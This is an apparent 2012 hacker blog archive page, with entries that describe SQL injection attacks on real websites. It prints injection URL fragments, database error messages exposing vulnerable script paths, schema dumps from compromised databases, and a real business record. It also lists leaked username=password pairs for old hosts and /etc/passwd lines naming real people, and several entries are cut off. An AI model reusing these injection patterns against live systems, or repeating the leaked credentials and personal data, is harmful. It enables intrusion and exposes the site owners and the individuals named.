Skip to main content


Showing posts from February, 2012 | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).

Some (old) informations.

***Remember that I've never abused of any website or modified anything or used confidential data.***';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query

/inc_ricerca.htm, line 12

--------------'0'9'9,1,2,3,6,4,4,5%20from%20user,%20name,%20'','','','','',''… | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------ (??? google ???) | sql data dump, data leak

I've found this data time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40… | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 in… | SQL Injection

Since the injection have been fixed time ago ... I just publish some samples (nothing confidential)

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15

db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection*%20from%20Sql39909_2.clienti/*&menu=Newa

old hosts (2003/2004?)…

old joe accounts of free websites  U: angelo  P: angelo  U: apostolo  P: apostolo  U: arny  P: arny  U: basa  P: basa  U: bedford  P: bedford  U: bonnin  P: bonnin  U: bubak  P: bubak  U: bucky  P: bucky  U: carlton  P: carlton  U: cora  P: cora  U: cozzi  P: cozzi  U: derby  P: derby  U: elin  P: elin  U: emr  P: emr  U: evelina  P: evelina  U: evita  P: evita  U: fania  P: fania  U: fara  P: fara  U: federico  P: federico  U: ferdy  P: ferdy  U: fisher  P: fisher  U: francine  P: francine  U: gareth  P: gareth  U: gonzalez  P: gonzalez  U: gussy  P: gussy  U: h…

Old accounts, dead websites, old passwd  U/P: ynws  U/P: daeil24
ftp:x:14:50:FTP User:/var/ftp:
rpc:x:32:32:Portmapper RPC user:/:/bin/false
schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash
pr0t3ct:x:516:920:Jeske Joerg:/hom…